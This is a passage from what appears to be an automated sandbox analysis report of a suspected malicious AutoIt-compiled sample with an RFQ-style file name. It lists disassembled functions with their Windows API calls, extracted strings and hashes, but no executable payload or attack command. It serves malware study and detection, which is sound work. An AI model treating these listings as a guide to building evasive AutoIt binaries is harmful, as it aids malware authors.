                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 001579C9
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001579D2
                                              • DeleteDC.GDI32(00000000), ref: 001579DB
                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00157A07
                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 00157A1E
                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00157A59
                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00157A6D
                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 00157A7E
                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00157AAE
                                              • GetStockObject.GDI32(00000011), ref: 00157AB9
                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00157AC4
                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00157ACE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                              • String ID: @U=u$AutoIt v3$DISPLAY$msctls_progress32$static
                                              • API String ID: 2910397461-2771358697
                                              • Opcode ID: 9030ecf5d77b19eb3b57d3eb8f74c4b4711e1f61585f317cbb0902c2ca144393
                                              • Instruction ID: 41e7e2156b6147329e51869082c5be3346f947015cce96893b7dd3ffb909ecd1
                                              • Opcode Fuzzy Hash: 9030ecf5d77b19eb3b57d3eb8f74c4b4711e1f61585f317cbb0902c2ca144393
                                              • Instruction Fuzzy Hash: 01A19F71A00215BFEB14DBA4EC4AFAE7BB9EB45711F044119FA14EB6E1C7B0AD41CB60
                                              Function 0016AB60 Relevance: 47.5, APIs: 26, Strings: 1, Instructions: 201windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSysColor.USER32(00000012), ref: 0016AB99
                                              • SetTextColor.GDI32(?,?), ref: 0016AB9D
                                              • GetSysColorBrush.USER32(0000000F), ref: 0016ABB3
                                              • GetSysColor.USER32(0000000F), ref: 0016ABBE
                                              • CreateSolidBrush.GDI32(?), ref: 0016ABC3
                                              • GetSysColor.USER32(00000011), ref: 0016ABDB
                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0016ABE9
                                              • SelectObject.GDI32(?,00000000), ref: 0016ABFA
                                              • SetBkColor.GDI32(?,00000000), ref: 0016AC03
                                              • SelectObject.GDI32(?,?), ref: 0016AC10
                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0016AC2F
                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0016AC46
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0016AC5B
                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0016ACA7
                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0016ACCE
                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 0016ACEC
                                              • DrawFocusRect.USER32(?,?), ref: 0016ACF7
                                              • GetSysColor.USER32(00000011), ref: 0016AD05
                                              • SetTextColor.GDI32(?,00000000), ref: 0016AD0D
                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0016AD21
                                              • SelectObject.GDI32(?,0016A869), ref: 0016AD38
                                              • DeleteObject.GDI32(?), ref: 0016AD43
                                              • SelectObject.GDI32(?,?), ref: 0016AD49
                                              • DeleteObject.GDI32(?), ref: 0016AD4E
                                              • SetTextColor.GDI32(?,?), ref: 0016AD54
                                              • SetBkColor.GDI32(?,?), ref: 0016AD5E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                              • String ID: @U=u
                                              • API String ID: 1996641542-2594219639
                                              • Opcode ID: cda57e75bde09811d00595ce15673d056773633bbd888fefa06e8fa059093480
                                              • Instruction ID: 2778c23e2d13e0e3e4ac91e100593bd8c1f080fff54891ba413d06309f3ced6a
                                              • Opcode Fuzzy Hash: cda57e75bde09811d00595ce15673d056773633bbd888fefa06e8fa059093480
                                              • Instruction Fuzzy Hash: E2614E71900218EFDB119FA4EC48EAE7B79FF08320F118129F915AB2A1D7B59D91DF90
                                              Function 0014AF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 0014AF89
                                              • GetDriveTypeW.KERNEL32(?,0016FAC0,?,\\.\,0016F910), ref: 0014B066
                                              • SetErrorMode.KERNEL32(00000000,0016FAC0,?,\\.\,0016F910), ref: 0014B1C4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ErrorMode$DriveType
                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                              • API String ID: 2907320926-4222207086
                                              • Opcode ID: 8dca1ea71f7a1fe5b456df24c0a83092e36f1a9dc3342db63ddf7adf7cd74ea5
                                              • Instruction ID: b944bee3a9a114770bbfb711d2c69469ff6e784d888072d9d12284280a21ac14
                                              • Opcode Fuzzy Hash: 8dca1ea71f7a1fe5b456df24c0a83092e36f1a9dc3342db63ddf7adf7cd74ea5
                                              • Instruction Fuzzy Hash: 3651A230688345ABCF08DB50EDE39BD73B1AF54B417614019F40AA72B1C776ED4ADB82
                                              Function 000E6A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: __wcsnicmp
                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                              • API String ID: 1038674560-86951937
                                              • Opcode ID: 05d7272acd1b892f8806bb63476ebf2b1144a3f88b05db46290c82ce872be086
                                              • Instruction ID: 8273344b4222f1d8101ec7e845055e781cf0d2d5d8929e3903a021171ed44844
                                              • Opcode Fuzzy Hash: 05d7272acd1b892f8806bb63476ebf2b1144a3f88b05db46290c82ce872be086
                                              • Instruction Fuzzy Hash: 9681FA70740285BEDB24AB61DC82FFE77A8AF24740F084035FD45BB1C2EB61DA95C6A1
                                              Function 00168C44 Relevance: 40.7, APIs: 21, Strings: 2, Instructions: 401windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00168D34
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00168D45
                                              • CharNextW.USER32(0000014E), ref: 00168D74
                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00168DB5
                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00168DCB
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00168DDC
                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00168DF9
                                              • SetWindowTextW.USER32(?,0000014E), ref: 00168E45
                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00168E5B
                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00168E8C
                                              • _memset.LIBCMT ref: 00168EB1
                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00168EFA
                                              • _memset.LIBCMT ref: 00168F59
                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00168F83
                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00168FDB
                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 00169088
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 001690AA
                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 001690F4
                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00169121
                                              • DrawMenuBar.USER32(?), ref: 00169130
                                              • SetWindowTextW.USER32(?,0000014E), ref: 00169158
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                              • String ID: 0$@U=u
                                              • API String ID: 1073566785-975001249
                                              • Opcode ID: fcb5e19d2d71611462ea78d5c11ef9ed11eb738f63e898863e4dce05b4524894
                                              • Instruction ID: fff263f4b18799d48af83e5e0867016f778daca935f425f8a8fc127d01959814
                                              • Opcode Fuzzy Hash: fcb5e19d2d71611462ea78d5c11ef9ed11eb738f63e898863e4dce05b4524894
                                              • Instruction Fuzzy Hash: 2FE18370900219ABDF20DF94DC88EFE7B79EF15710F108259F915AA1E1DB708A92DF60
                                              Function 00164B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCursorPos.USER32(?), ref: 00164C51
                                              • GetDesktopWindow.USER32 ref: 00164C66
                                              • GetWindowRect.USER32(00000000), ref: 00164C6D
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00164CCF
                                              • DestroyWindow.USER32(?), ref: 00164CFB
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00164D24
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00164D42
                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00164D68
                                              • SendMessageW.USER32(?,00000421,?,?), ref: 00164D7D
                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00164D90
                                              • IsWindowVisible.USER32(?), ref: 00164DB0
                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00164DCB
                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00164DDF
                                              • GetWindowRect.USER32(?,?), ref: 00164DF7
                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00164E1D
                                              • GetMonitorInfoW.USER32(00000000,?), ref: 00164E37
                                              • CopyRect.USER32(?,?), ref: 00164E4E
                                              • SendMessageW.USER32(?,00000412,00000000), ref: 00164EB9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                              • String ID: ($0$tooltips_class32
                                              • API String ID: 698492251-4156429822
                                              • Opcode ID: ba7a2af5dcf41d4773d79fe16e7d5205bc9ea3049959dd60e1d77b225fc05a24
                                              • Instruction ID: c98d6533ea2300194b4711d59c23c9ba29ac6b6b40c00b11e3a5002a9e3d0ea8
                                              • Opcode Fuzzy Hash: ba7a2af5dcf41d4773d79fe16e7d5205bc9ea3049959dd60e1d77b225fc05a24
                                              • Instruction Fuzzy Hash: C5B16871608341AFDB04DF65DC48B6ABBE4BF88310F00891DF999AB2A2D771EC55CB91
                                              Function 001446D6 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 001446E8
                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0014470E
                                              • _wcscpy.LIBCMT ref: 0014473C
                                              • _wcscmp.LIBCMT ref: 00144747
                                              • _wcscat.LIBCMT ref: 0014475D
                                              • _wcsstr.LIBCMT ref: 00144768
                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00144784
                                              • _wcscat.LIBCMT ref: 001447CD
                                              • _wcscat.LIBCMT ref: 001447D4
                                              • _wcsncpy.LIBCMT ref: 001447FF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                              • API String ID: 699586101-1459072770
                                              • Opcode ID: aa7144bb229253f1d634a9cceeee44631d3096cba13e46a0f6c41bbc08b1ad68
                                              • Instruction ID: bf2995d1c6756b7b644d7574e9f40203adb50703cde985b6a7572ee659e6ea53
                                              • Opcode Fuzzy Hash: aa7144bb229253f1d634a9cceeee44631d3096cba13e46a0f6c41bbc08b1ad68
                                              • Instruction Fuzzy Hash: F0413872A002057BEB10B7B49C47FBF77ACEF55710F10006AF984E71D2EBB49A0296A5
                                              Function 000E27D9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 286windowtimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000E28BC
                                              • GetSystemMetrics.USER32(00000007), ref: 000E28C4
                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000E28EF
                                              • GetSystemMetrics.USER32(00000008), ref: 000E28F7
                                              • GetSystemMetrics.USER32(00000004), ref: 000E291C
                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 000E2939
                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 000E2949
                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 000E297C
                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 000E2990
                                              • GetClientRect.USER32(00000000,000000FF), ref: 000E29AE
                                              • GetStockObject.GDI32(00000011), ref: 000E29CA
                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 000E29D5
                                                • Part of subcall function 000E2344: GetCursorPos.USER32(?), ref: 000E2357
                                                • Part of subcall function 000E2344: ScreenToClient.USER32(001A67B0,?), ref: 000E2374
                                                • Part of subcall function 000E2344: GetAsyncKeyState.USER32(00000001), ref: 000E2399
                                                • Part of subcall function 000E2344: GetAsyncKeyState.USER32(00000002), ref: 000E23A7
                                              • SetTimer.USER32(00000000,00000000,00000028,000E1256), ref: 000E29FC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                              • String ID: @U=u$AutoIt v3 GUI
                                              • API String ID: 1458621304-2077007950
                                              • Opcode ID: d55805f198cea255c4c816d509e5d317964f7b49746e5cb943f36419857e6acd
                                              • Instruction ID: a1950529fbf14210c1168a6c21fab359741ee773ecb3ee66eb1b657243623ca2
                                              • Opcode Fuzzy Hash: d55805f198cea255c4c816d509e5d317964f7b49746e5cb943f36419857e6acd
                                              • Instruction Fuzzy Hash: C6B1807164024AEFDB14DFA9DD45BED7BB8FB08310F148129FA26E72A0DB749881CB51
                                              Function 0013C4C1 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 169windowtimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadIconW.USER32(00000063), ref: 0013C4D4
                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0013C4E6
                                              • SetWindowTextW.USER32(?,?), ref: 0013C4FD
                                              • GetDlgItem.USER32(?,000003EA), ref: 0013C512
                                              • SetWindowTextW.USER32(00000000,?), ref: 0013C518
                                              • GetDlgItem.USER32(?,000003E9), ref: 0013C528
                                              • SetWindowTextW.USER32(00000000,?), ref: 0013C52E
                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0013C54F
                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0013C569
                                              • GetWindowRect.USER32(?,?), ref: 0013C572
                                              • SetWindowTextW.USER32(?,?), ref: 0013C5DD
                                              • GetDesktopWindow.USER32 ref: 0013C5E3
                                              • GetWindowRect.USER32(00000000), ref: 0013C5EA
                                              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0013C636
                                              • GetClientRect.USER32(?,?), ref: 0013C643
                                              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0013C668
                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0013C693
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                              • String ID: @U=u
                                              • API String ID: 3869813825-2594219639
                                              • Opcode ID: 8a9771bbc09d35443305d427daf14aaa572cd49703b8b32cd649f4ecf31ce628
                                              • Instruction ID: 487b1483a23f35af8d32eaa894304eb927e0bc012330a5f152d3e96fd35205b9
                                              • Opcode Fuzzy Hash: 8a9771bbc09d35443305d427daf14aaa572cd49703b8b32cd649f4ecf31ce628
                                              • Instruction Fuzzy Hash: 76516071A00709AFDB20DFA8DD89B6EBBF5FF04705F00492CE696A25A0D7B4A945CB50
                                              Function 00164069 Relevance: 30.0, APIs: 3, Strings: 14, Instructions: 283windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 001640F6
                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 001641B6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: BuffCharMessageSendUpper
                                              • String ID: @U=u$DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                              • API String ID: 3974292440-1753161424
                                              • Opcode ID: 1ae1a9bbd2232991b04e07d9cfd0d162cc7b9393d3afb76f6191c24fbae749dc
                                              • Instruction ID: 805be1b0d34c4103b637b5775b93fc82a6cba47b14678d406682869e055f20fb
                                              • Opcode Fuzzy Hash: 1ae1a9bbd2232991b04e07d9cfd0d162cc7b9393d3afb76f6191c24fbae749dc
                                              • Instruction Fuzzy Hash: 6BA1A0302183419FCB18EF21CD91ABAB3A5BF94314F15496CB8A6AB3D2DB70EC15CB51
                                              Function 001552F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00155309
                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00155314
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0015531F
                                              • LoadCursorW.USER32(00000000,00007F03), ref: 0015532A
                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00155335
                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00155340
                                              • LoadCursorW.USER32(00000000,00007F81), ref: 0015534B
                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00155356
                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00155361
                                              • LoadCursorW.USER32(00000000,00007F86), ref: 0015536C
                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00155377
                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00155382
                                              • LoadCursorW.USER32(00000000,00007F82), ref: 0015538D
                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00155398
                                              • LoadCursorW.USER32(00000000,00007F04), ref: 001553A3
                                              • LoadCursorW.USER32(00000000,00007F02), ref: 001553AE
                                              • GetCursorInfo.USER32(?), ref: 001553BE
                                              • GetLastError.KERNEL32(00000001,00000000), ref: 001553E9
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Cursor$Load$ErrorInfoLast
                                              • String ID:
                                              • API String ID: 3215588206-0
                                              • Opcode ID: c67d3395eccfae76870a44b1d41fc4333c8474da22491dc2dae8c37a8ff4d7d2
                                              • Instruction ID: 72d1debc3c0ee6468eb372aeda569969073925b20552e1fdfc8f1816357bb877
                                              • Opcode Fuzzy Hash: c67d3395eccfae76870a44b1d41fc4333c8474da22491dc2dae8c37a8ff4d7d2
                                              • Instruction Fuzzy Hash: 09415370E04319AADB109FBA8C4996EFFF8EF51B50F10452FE519EB291DBB8A401CE51
                                              Function 0013AA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetClassNameW.USER32(?,?,00000100), ref: 0013AAA5
                                              • __swprintf.LIBCMT ref: 0013AB46
                                              • _wcscmp.LIBCMT ref: 0013AB59
                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0013ABAE
                                              • _wcscmp.LIBCMT ref: 0013ABEA
                                              • GetClassNameW.USER32(?,?,00000400), ref: 0013AC21
                                              • GetDlgCtrlID.USER32(?), ref: 0013AC73
                                              • GetWindowRect.USER32(?,?), ref: 0013ACA9
                                              • GetParent.USER32(?), ref: 0013ACC7
